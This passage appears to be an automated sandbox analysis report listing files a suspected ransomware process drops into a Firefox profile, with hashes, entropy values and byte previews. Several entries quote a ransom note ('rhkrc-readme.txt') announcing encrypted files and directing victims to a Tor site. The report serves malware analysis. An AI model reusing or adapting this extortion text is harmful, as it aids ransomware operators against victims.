                  Preview: ..87.#...<...........9.......J!..S..t.D..^....{...H.M..KG..-.w...7\.D*..v.Wb......X.v......[.U..z..M...8M....o.M.8.[6.../...k.A....4..4..N~rYYT.... mJ[Z..8`U*.\..U...-......I?G......u..U#.Q..A...[.....W<H......%..&Ng..6uC.De....(...a.".R......q..:h.=......L.;.f....lz..y..1S.T^..n.#.i..Q....w.v.........H...p.q*.ZF......UmIwa.mC...a.Sa.wSe.}..!P..Y....`....GaYxk...:H.x.7..D.}........Bg.....o{.h.F....Mu;.p."..v./..v9elp..0-nj..N!....x..ho>+....h.g0.]1.7LBE.[.v.es.k.rj4."....6V....Ju...U_*^...\..q@.....+N&.r...~:..ql+y....o......n.N.........z.Z.kM....-.C..3.%./<..r]..U.....1.("..3.'.......#M...~......6=....0.8kb...3...I..(I...LA..F.GV..%.5..C....h..(...U........B..o.T.......h5{.........7.3.b_.{7.KI`..`r)....f..26...=/....w..,r)%.e..28Xb.e.X.Y9F&/..0?.%....:..e#.x.V.jHs.U.s.....s.U[.".....d:=.p.....2T....q<1.k.P%.(7.......^......X.....". ...29.....'.....-.....3...T....(.....h.@.%E..B7.7h....-....1S...up...3|$C.......9..!....O......W..H....`..I........@9.w^C..G2..t+,...I..rcc.r..=.....[.u.("
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E4ED869149E42472064566CF555F4CBDFA43F6CE
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1386
                  Entropy (8bit):7.645638218546822
                  Encrypted:false
                  SSDEEP:24:wfILLfHkNrulx/ECxZZJiu2+KWWxbrDzr2Df3TGr9:wf4fHkNsxsCFZMWWRzaD7Gp
                  MD5:4B48CAEB022CB85981804498CD36BBF5
                  SHA1:3C3A7541C79F0AD6B6494A91D4B764B74CB5B31B
                  SHA-256:2F9D7C6FF363B0937F328136CA363B2D3DE929D90BD5213B2A89DE80596CC037
                  SHA-512:A858F253C7ECDDEC82A5470AFCA86DC9502700FB5F79C2027233A59B876994789A9E2722FA4376F90671BD8C95BA6626A0C56788DEDC55ADA2CA67ADFDF41DAE
                  Malicious:false
                  Reputation:low
                  Preview: ....n!.&.No.o^.......z.....GY...2_.........-.._h...|.&O.K1xT...Y..X8.m..-.p.....'.u...a..Hf0.@......8.1...&>.....P.....Y..M.*......T.....9............e...N.r..._.\.......l........s......3..$N&..>...Suh!..X...V...4.........$..s=..{.K.kL.......'.h..`...BMY`.1....:w$..GC..k2..d..F...e.t. ......'."[..8Wc.#...%.p..l.......e....\..Y..S'E.wZ.H...m/F...e...p(.OO..._.X.P..g..._F.BX.ykO.../.F:.*..!=..........3....Q.R.b`.>..1...j.A,[d........iu.hN...a\.]#..;.....&.bM.I...3P.".2/Y9...~.W...../....N6a0...TI.uJ...)..:..8.6...%......6wxt....O.Fu.-..@.0....../P...O.......0..8?fb..i(......,."..?-p.....>..a.....~...Z[`2.M)....#....d.r......%.X...Z.).aJ..JQ....N..X7..O&..............P &.....:.4f....V.47....b.=..(0..z:n...|.|..f.-&?)....X.].U$.,...V...B..n..Y.\.1$.d..GC....P.._3.T.3pa.7.'./..V..:.T.+.iR\W.<ElR..7.=...?P-.w%........z5=M.6....a.:.z.5.K.%.#..`.o...L..+.........C.bnp.@.~....c.:.K.@....b.......cku..#M0..........h...X.3....:....n..B....:Y..^tE... ..........W.,.......................M.3.%A.r.X..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E59C4C731883450D84A0BAE7FDD94546BBC8DE04
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):10727
                  Entropy (8bit):7.973085294391312
                  Encrypted:false
                  SSDEEP:192:51QvG6SBN7ssQZehS28Vnh4K3DyXFbPmxQit9p2Z3fVq3wT5OfyOV693tqU77:51Cu3s5ZeUnhtWB9i+3fVq376J7
                  MD5:68FB0D356E56D9540731C34143AB5999
                  SHA1:71B8264B82770C8166238F6FE29203249E0283F5
                  SHA-256:732C94001FF2FCDA080BA57CCE87AF0DC002C71DF3D9D806AFE7336358FB91B9
                  SHA-512:35CDE733C5726BF76882656BDBCB4C825205B55B8552804647CC4D62562572B1010735A67DF830BAC0025DEFE12C0674554E2E1346880C2109D9FA473F38E19C
                  Malicious:false
                  Reputation:low
                  Preview: 8+....V.o.....H[5Gx......r.-..G.$:.....^o........C..4.q......(.a....../..a.5..'.%.V...s..........g.4t.:...e.y..)f....2...C(...].|_..~u5.0..).....FC....Lk.r.s+K.+?<....tZ....cG.m.:~d8.y.....e..24.....m&..?.....&K,.....!F......i%!..L..W/x..!.Az.n.U.....c;.U..-...n..r)......4=.U....6E9;a.o.?Y.s).kN;....h3.PE..../.......e|I...U.5=....w..A....|........p.(....*V.....t...b.z.b.].....,hC5nH.x~.u.BF.6.6....B.B.......6......y..5...iB...Iw.......t.T..Q.wO....!.J..o#q@Z..gL|...:..g.o"9.....x.8}.@1......E.rS.....)....j.O.6.f..."...AO....l..0.1..[.....AH...B..........g......SR..S.|.QR;......a..n..C%.DP...P.].k......*........t..._.....V.....d>.E.vg..u...x.]$........E...)U...NP.+.d...M.H...Y.*.<........j...e.z.mt...X..P.I.....T......YQ.[Vhj.U.........a.3;.....1....L(.\6..2W.v....ib.H}.csia..e..>\.C....5.1@......*(.R.5n..........I.....o...`...W.e5../.I.v.%..U5..*..bA..].6.u..x.y....J......4..9...WH0.B..w....a...K...@<(m/...Fm...~&.....<+..{.L..}?..t.Tv..iC...#`.f#~... .R...j.9EO.(...D.r...h.`.l....X.D.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E6D66AFFD836C8C13B306AAB42C9C6E3425363B6
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):12557
                  Entropy (8bit):7.976756416229117
                  Encrypted:false
                  SSDEEP:192:pabukENnpcOSxAxKFQTNhLb/S+LqXr+TeKkF+eQH4kYTdTxPzTcsaBGTpLW:Qy1rcOcAFnS+OXr+rkmH4kETx7o/Bm5W
                  MD5:0217CF8C360A6389B85EAAB7796E0D0B
                  SHA1:FAFBBC4A369260F6269043CEBBF7E476DC506496
                  SHA-256:2FFBE9381F494731DB35C52327570ED32409CD8BB1C3D85106A5A308877067EE
                  SHA-512:250E70EAA47984FEC22DD3B0307E573CA5599F7572CDFEA7763F1A98A9FB4BE03D79B41F26A5CA322D215EFD956A226044AC09A4DC66C8DE4A23A6E110E68C6B
                  Malicious:false
                  Reputation:low
                  Preview: \.....!;.Q.c.v..y.t.:......Fio.A...4........"*w..2.c.....~<...B.o.@.....i2..T...6.sD_.S..Z4|N......n..h...-..u...LJ..o..[ 0......ko...ZO.(.^YT...Ex%...y{..._.;F..g..T....Y/\. Zt...^..9-.k..b!7<y...u.Ky.G[...nl......d...n.T..H..K....#..`.......m......(l..M./.R..2`.$.Ez..`.H.A._.t...B......%.....UwX..=m.1.]ot...J..QT.......Wf...2?.7........e.HW1V...........-f .}tlk....4.m....9~..P..t.(o..?7.X..`R.).J..iOR...U..j..9.L..;..b.]..h...T/..>.M....U..h.N?aCi.....5.-.....8;JG7.}...;...=.....,X.X.....&y.)....i......i..M.j.O+._.-2.6W..........i.F.0..cg(9.7......V.V..../.....K..TS...9.5..O.|..`;)....k._.._5.......\.....A../..eK+bE.+R.!t.0!-.I.j....8..;..{h..;...Q....?Fnhm3..-Hc*.W..5.t....8..5 .`...b.........[N.......N.......y.3..p.cu..@.a..R...w ..A..8.:......0W.)mHHj.n)w..7.x.....O|^?..1%......Hs?.-.......E..`..&.C..eC.............J.5B..'..&....(.}#.|...B...*..u.0.F.....,.MwCz...-...V.)../...d.o..P.......nN.....9..8..[.0..5c.....;....HQ..._......d......(.X.5$...x..8........GB.......N.....X..<....
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E771454BB360CA5F7AA169E5416B493549BC2F59
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):16222
                  Entropy (8bit):7.983065972793099
                  Encrypted:false
                  SSDEEP:384:z75FMPS0/g2pty2Y1Ftr2yNicpJhPN4TnAr4:sPdI2ptmTZTJhN4
                  MD5:F46C5282424F50B1BFE7869E1594AC8C
                  SHA1:F25FD316D73DE003B59BD3E33B155CEA92A74D4D
                  SHA-256:CCB165CC1FAB65809623C3F44C46732DB2AF854BF47C868802FA1367C0A5B2E2
                  SHA-512:75553F791C7415167613C90AB46C9F423C93605FDC8C52BAB43447C21DA3860584D0ECCF4266E10E74D6F8118F1F74D1B6DF3E2E75C5E019803540C601CDCB86
                  Malicious:false
                  Reputation:low
                  Preview: .:.......9<.......nQ..j^<X.L.A..Bf..y...M..5=...LG....if~...H.D..b)..!..#.g.;...e.7}.V.N..|L.].H7.#.S>3.!...\Js. U8.Gv...P.$I?...i....WK.=!ue6...2V.1..:.38...{.5.c..Kr.Ue.<.{y.......SV...9..U....p.....,..d.....T....l...^=...*..?.0..)x.../\.z...h....qe......}:..r....A..P..Xk.....:...:.......}-L........p.M...g.$f.W.@....:..if..S3F......U.s&YM.....tG7.[s.......VQ.P..)..).rm^|...A[.(Y.......B~...J........>.:......(...A6.%. .(7..%.!....lL..Y:..C.b..5.........R.s.uzN..?/.g..=..P.)..&...F.a0...*7.2....$.vG&.f.j...v... ...w.x{V.../:nN...1.Q:...a...8......q.@.(+x.5$m<v..I7k.;..oGr+..LR7N..n.......JAP...X..t....Q..xo{."....^OU..........9....}............0.I<&....R#."'..&*..........6..W...=%.E........Jh~u.Km...l.Kv..EPO_...#.:.G0.....J9.K....=...N./...A..........`.L....n..k.9.4O[...X.....iK..&...d.@..m..x..........[..).s.A<..)/c.X....-?.........'.=T..3g..... .H...!.h..0.!2I,.9S}8@T......9...W.v.9...)...y.'....T.'v...*F.........8m(.#..FC4..5.......r....t.-f)......*.....}.....~....E...?...R./b.....
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/E7EAFD1748127CEAA48DCDD05E7998E3CAA95B8C
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):16883
                  Entropy (8bit):7.9852545261450105
                  Encrypted:false
                  SSDEEP:384:atw9LPCAXQiKN+Srp4c3BAFTm2Va50Gqd1Vtd6QyO5k:S4CpqSrpVKtm2Va50GqdvGQyO5k
                  MD5:B828F736E6C03095BB2421C4D7130018
                  SHA1:C235D925D625A957D056DA7E4446F5D487D31D00
                  SHA-256:794E8D34CF3765AF25668BE925645B883D73C3F42EC044CCF6FA79BFAA0F1A44
                  SHA-512:EBF1D04E29F7AD8089F6A01A8F7F9C33CBFE39D269DAAD1F86E1D6D02D937012FF3E409C162FE92F792222F5B6570D6422DE532A8C35A3F32B5EA89E5307E3BF
                  Malicious:false
                  Reputation:low
                  Preview: q......`nQf......|%....."vZ.e...*ul....y..r..jD....|.6K)............'ao...~..RuF/......>w.j@.NU=... ..A..n;)g.a...lI.s.|%.........b...:H4.|....>.d.N...=.6...I.'.9L.N..8@s.3..JI....4...)..H?..`..?()..5'C.%..v% .._.(B.......]4.S.'.c{....R1...9...F..E.....0.;.. ...)Cjd.......d.Fu?M.Wj.....i.ab..Z...g........%gi.^......@i....Rg.. .A...#C.......#.W.7.c.$.!..e..^h0.^.......m.G{iJ.......+$....)9Q=z.f..86>7......O'PM.(.-.`.=MJ\.cd...\mX....2...!...X/..I..B.....#...I.x{C..........L.$....s...F.6...Mh.%P\.]:.CwL..\.0&...#...a..]...bA`..-.)1.L\..........p..j.I...}..2..Y$...xUT..t?..3..ib...N...f>9)W"Qz3..1.........Q...G. ....;..]'qc3f....r.Bx@v.4.'.y..x.....j.. ..&.0.....%@xF..#S.H..g...o.R..nI..P..{....=.f..o.zgJ.._W..U.G......_UJ/h.5..M&`'...."@.[7\..]].N^.H.s...Ut..!.....n..2.g.)..S.J.].d.`..2...(.G.T.`...ra.+4Fi...6.....e...1.EGW...GF.)(...z...r.....X...I.....z..s(k...1d....[.../Ou.'.I.u.#.j.m..#G....t.?...;.....x[t5ri....d....!...)1.m..A..k..;.l.._..3.8......6.....%.J.....%..`.tj><....Y.G.^R!
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/EFBDF11BE5924869AB758722597BCD4B9EAF851C
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):49453
                  Entropy (8bit):7.995858599786735
                  Encrypted:true
                  SSDEEP:1536:al1qOIoReNOUUocXrXTb1yL9ldhZl/UwL:al1t0N7UoYX1yrXLUi
                  MD5:5D57BBC2A2148CBCA7096180FECB1793
                  SHA1:20E55432842CB931050EEFE522DF3340593101F5
                  SHA-256:1100A6FBEE00D7B6414CB96DDA2B6EC767E1C87619E10D5349A2F12F746ED961
                  SHA-512:55377EFC5B4FD759276599175C576C71805E395BA4353881C02CD9A0BB412190A7E0259D0B29BDFEB752314BA0C8C75250F8355502B882307B7B843CCD69CBE1
                  Malicious:false
                  Reputation:low
                  Preview: .Ya....[X ..%v.3..qjAC.b.4EIv..K..Qfp....yP.c1`......a.x.<.Z......"..B...~..ZZ.U...E...6.......h....r3...q,nmZ.s\oi..tdM.P.#.D.9.....w~...;.i;8..b.........8x......~G...K..u.Y......'V...^...0..~.b../.....T|7.%.].L#.Nx..f...6.@.8.:.$.a.G.r.._..S......d...U..s..(.p..c....-...&L....y.....3{...............pY... ..G.?...#...7.a....m..\.<.:.....J&VGE..G..jL.*.d.,"?.'w.>}.0.:=k.l.J..c.!...<.t...i...k...j.C.'=6>.!..-...i..U..5l.....0.}....$v3.e...h(..........C.4.......:..?.&....JQ.i...6.".d.dg.H....a....W....\...b.<&k._o.3...%..6.;e..............*_%9.c....-_.pw..a8..n 1h.).d.80&8!C.HX3Tp....kBf.u.q..,..].F..&..xxBg_.!..(....]...#@...B....b..x.Oz..Dc......u..........E;...U5Qm...O....;7......=......u.i...#/.. Qm.H..y:p+Wp.bU&....d..Lf.p.....H..q..!......TxYcns....g.P.s......V...$....i7"v.d.WS/..-...8V...k[.!....B.jW..KU1Ds.d!4!......L...d.........#....W...V-.u"....[.0...B........rc....U.hO ......[z1GQ...,.........?{........D..$.,@A.#...l...........?......tHs.l......h..}.8.T....6r.{..].{I.N....&.>
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/F17F04878A68505AE5481A71D8B733C5FFC6F285
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):11471
                  Entropy (8bit):7.974453449014158
                  Encrypted:false
                  SSDEEP:192:DfqCng8XvCHrOnyYvdrV4wFvXBZDYpagdnba7FitrZVQwybl/z8dU/3DlOIYDm:DfDgrOny+B4MXBZDYp7MitVaJB/9TlOg
                  MD5:A25AC65DC6C979050C4AF19B9D4F8377
                  SHA1:41317CF26591500800D136C19C082B9EEA2397EB
                  SHA-256:4ED283EC4143A777B37E83ECE3E1ACBD9E0F822845D5148FEA4E8115B3C03990
                  SHA-512:BE9B0037251F7C91CA2FBCBDC47BBE0A1BC279A243FA84FEC8A4B39D23D6EA4FB567301A4FFBF0170CA9CFFC550B9365A15A60EF8613E878AFF0FE05FCDF21AA
                  Malicious:false
                  Reputation:low
                  Preview: .......x..u]L-......Q.o~..Fx.k...5..=....`"f%.6...?../...c..2nw&......hw".7..gL...uWyW..~9j.~+.......8/...8k&o.......v......V"|F..1...W..}.....tT......V$V...a...[!.Y|Z....4?.U..........Q.~..Vy...C.1.N../...G5..m.....lB..RY..._.|>..(.. ..KN_3.Z..F...B.....Y.tM=.......J-q....3..N....>x./c@>vLe.7U.v....yx...`HC...L....D!..q....?I..\...}..6...7!...h..8....n...!..U..';ha......w...A.IU3/IE!.Hb..........aC..Wz(\..%.G..........M.SG.C.,.9(r.....S./.'..57_t.g....BpS..Hq.B...(...y..e.]L`....+{fN.F...;......lN.....0../..xM..<..}{...\..?....V......!...........L.......A..e7...>...$$[MB.9...\.....%W.+....RC.#....8....D...h..N..U.Y.....<....A.....y}...........e.D|...i.p..q...../r..x.....d[..u.......-..C...l">SX.;(...d'4wH......a......PK.F,..9...U{.......n5.G.j...v&.....<..>f.Z.e.....a.........y...3.jR..j.O{.....|.Z<.#.FD.N.u.d...q.>...._..%./...tp.@CRu=A.Sg.0..l...f......B.9...f...N5....H..z..z...(. ....h.pQ..f2.o:.-..N.^<2..M{....D2i.i1.......q..#..oZ...Y.Y\..-..pm.E.|V)n?e..qC.3VX.....;..i..H\.`.)..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/F2CFCA6D14DE5FA96E3127D89121F2E6F004D2CD
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):14321
                  Entropy (8bit):7.9808847286609685
                  Encrypted:false
                  SSDEEP:384:FeNAa2QEufNt6EWNl1gXI1vWbW4wr+HZFH4MD:FaQu1tBWtgwv4h3D
                  MD5:CBCA7742D02191A47C399E628E4F6A1A
                  SHA1:B4EF4CB01618BC1D9002E9D9D26A9D96C6860EF8
                  SHA-256:32B61E8C2ACD97E2507975164FCAF10EDC3DCD1F79442D2A5D6109B25FE32164
                  SHA-512:A48E154485DBD6AF73FCF0A9F1A057AF883A7286E93BB6B8CD0E6AC03FB5BC6C77C0775B18C655FB42836B9B2F679368B74252ACDA4F10148F04F50AFEDFFD9E
                  Malicious:false
                  Reputation:low
                  Preview: ....4...]....[.%....V..$...P..?...L>&.X#.........~.=..$..^gp.'.<}..t.IM"w........'0...........rD..I..d....F....?.P...W...z{(.{sA...........1AN.^...q..l....Hy[.."...)...]bp.......)...R..rXb...).l..pf..Q>.r(.m#..^./..r..o...%30O...(...M`.d..?...Bjw...J.*.aR.....E9...&..PS..l.T....k.'...S.i...L.&O...3...~@....[....mE.?........0.*.....~.>...`...."...6(B.E~..P:..B.wv.........pJ.9.J4E.Ps..W.zbYS=1..^..I.`j.gH.......+Qb b..N...Z+.......,.....aZ...2.....?.o..,.:..2.....D.0......g7..uZ.,.E..7....U.....i....sAn..H8 .#.......B..U..$...H..rDyH),.s....)....Oc..v.....H........z......5.$.OF-f.z..G..,G..k...W3.*..|.......7...{.u..}./`......h..-.M..J.q$E..C.l.3.W......y.b.d.....U;....|...>.0F...t....p."an.yh........$Bc..EMS=+....{Sl.......G...K'...t%....g..~:..$.....N..P.......cd.....;B%.t*.1..........C.ZU.l....,Bc....s..KA....4.Z....X..3)u.....e...T.h.:..B.$D.u^:...!......$t....$w~.....!.k[.O..+........Y..*D..w6B..b..e..=..5[.Pb~r..jaUO-......fk..A......[..R..a.|.-.?W.d..............iA....w..-...c.2.i
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/F8AC72083E334F70A553AE68455FBDF0E65C5221
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):9334
                  Entropy (8bit):7.967725704368004
                  Encrypted:false
                  SSDEEP:192:pjaP0BnAuk4k8YEwusjmTaT2G5wLS9D2N8904Suz1YYr+fZ:APanlM8SuswK4A2N8C4YnfZ
                  MD5:AD1F1513216B12A6C21D55EB78224717
                  SHA1:2A4C63A0FCA5A9D97E87D550E3C64770577738B2
                  SHA-256:699F3FF34DE7123FA1F873292A5CA5FFA82A39EF87FA6333F9F5F5E1F7FD12F7
                  SHA-512:B66D21AB5D815677AD9B8AA9386DE0893400A4A90C9F950E829422967248DE5F7D9D93EF3513BBBE8FCFBEF7254B45EB0BEA5542A81119028BC3BDD26A1E2B53
                  Malicious:false
                  Reputation:low
                  Preview: A:....xpi.PMB..F....(......$;_G-*...r..).t.48\..dR....=..hb.)g.)*..@...)...<b..w..I09.${..9.....a..S.{..uz]@.p........~.j..^e;e..&.......?.U*-U.hM"..._vx..G4;....8u.v]..........e.@W...@.:....>l...H...D.j.........u........5Q.......M.0~....Y.s.r-c..7.......3[h..3..H.$...b....I.S....#....!l!Q.;T....!...&&.c..._.J.8...?/...y .....Q3...M...?.H...C.hi{]....k.'..t.f..p?....u..Q}.t.....1..E....W..X.~cL.`......f:.o..cX.....p...X...i.O..oq.v....l....'\.6.....p......(.....a.1....^f..L,.......K....q.....y.[0..3_......qL....F.W<.w.C..4.*.S.K.d..A_c...........(.@/. ..W...rd..j.....l.....:.-F.=X.....o..0.....]t.A.0.4.=..3..L...._i.....b ..e.....D.)..........F...Y..+\...B......p....v....7..du...n.x..Z...Qc]....h..5.q...9...}h..N.....d"I..2.$.T.........Tw... ......K....*..2*E#..bZ........./..T......;x....F3..GI../...C.?...a...+.....wYh..m.o.*j3.....U...8......6{.W.:..K..9/.r[0.M8....~:....g...S.....Vf]..O2..X..@..T.[.......X.6....2.....{t.h.cy..T?...Aa.../.l.s.+...<..?...{.m.4.R..82.._.....dz.SO...ME.0
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/entries/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/cache2/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/directoryLinks.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):2304
                  Entropy (8bit):7.81415568980384
                  Encrypted:false
                  SSDEEP:48:rFepUFiXV5QBmDptQl6neqsFOXEHXdga2WNa9FDL/:xepUFsoaptQlCeqyOehNa9FDL/
                  MD5:AD6A321E6FCD63D93C3B358AB062ABAE
                  SHA1:A5BF5144C42BEFEA3FE792EA488AE88C8679F662
                  SHA-256:4C0312CD5168D35AE9223B08C6F0B2BF29CC3AF77C3FE773F6AD3D3DB464C20A
                  SHA-512:9EF1518A63B587BBB5C250A597758D9ECC6BE2F65E5118EA24973D369D83EB7B7A5B705C41A5704CA4034F6D77EB4283B15109703F183F64702A1BE5E8246D3B
                  Malicious:false
                  Reputation:low
                  Preview: ...........Q..\....Pa'...^V.v....8....[5.'..a.....q.z...bGb....O.e...a.a!.3...R.,..1z..a|5.D8dFO.-.t;!j.nA..s..tD..B..'.[@..P.=6Z........}...........lw.A.`..;...u.J.n.......(...^?]....a=4X..+..dd6.....;.......\......]........|=..F.5......A.......,h.=..)yf.........O:..AL..._k9|..h..#.w..mj.w{+..\..~.3.0.aKZ.B.h4.f.X...OPA....n..g.n?.] .%......]yL..8.F..n.v......~..<...w.Z.(.?.IaN....?.\[.......d.@..~....<....-.......A]H.......S....x..'*....h5*.k3n.Q...W....~..........o1e.C.zCZ.. .8..q.....9.Ti..T..............N....;.."G.....n4...%=~.q...p.e.q..........#... .x.%.9y."......7".j....!/.17.J.|FS.....P7.o..XQ..Q........ ..u.F..#;.*.4..6....5.#.....Z..;.....S...e.dG@.....l.,.j.a.F..d.....-1G....c..(^......_....(r.8d..l......puY.;_.qrx(KK.t.T^?H.@.-.........8.....V.......wE` p.%zF.z*...........G.g...l..m.nNK#<.._Z.......m.......8TE......'...]...@...F.X...*.......X..u..Z,Vqy.af.1.4.......jm.:..u!4......H~.p........c...cG.T.!WA......D.<6..........D....|.....-......../..'F...9.....)...^Zp....,I.=,
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/allow-flashallow-digest256.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.08046354795861
                  Encrypted:false
                  SSDEEP:3:4QjAegDuHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1iRFsW6N6DJn:geGu11zmhOO/EUyp6XcIR6JNQJ
                  MD5:35211BD90B7858B78839E9F52FD1CFA0
                  SHA1:F750DDF9A51DE44D683951FDD0D4DF5119B5DDF9
                  SHA-256:D326644C2673E649ED161B245DA94F7F5FCB920E9FEB71C6EBCEA2479FB7DB8D
                  SHA-512:E3DFD4D24B5C6CF3A976269066F71536643CA11428549100F6F8C66EF9D4960156F0CE72E48EFD79BB17CC67E42D3AC5545AB9617A1BBDDBE5F131E94E6118D4
                  Malicious:false
                  Reputation:low
                  Preview: ..E....H....D..9%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................n..'.7.].-...g..g3...<.:..]m4.....3ID..q...P.........D.y
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/allow-flashallow-digest256.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.563313903560243
                  Encrypted:false
                  SSDEEP:6:JXQa4qYxxi1axDfbAjcv2vclPDN0CE11zmhOO/EUyp6Xc8AGmqn:J5Nexojcv20g2DcUBfAGmq
                  MD5:7181336C4E0D1A558814533649F04755
                  SHA1:0413362F44569BC9C4498CE2DFB50967DAE79DC3
                  SHA-256:7113F5266F65C66BF391C5D8F40A27C78DD093F3CFA28718FCB46042FA564D90
                  SHA-512:CF5C74AC0FC0F26DC087C625768D5B19AF0259203D6C9766BF032EC19A45BF7C9EBA3B521C20EDB644D7DFF369E5CA9A2A3FA1DEED3DCC003F57E720005E94D6
                  Malicious:false
                  Reputation:low
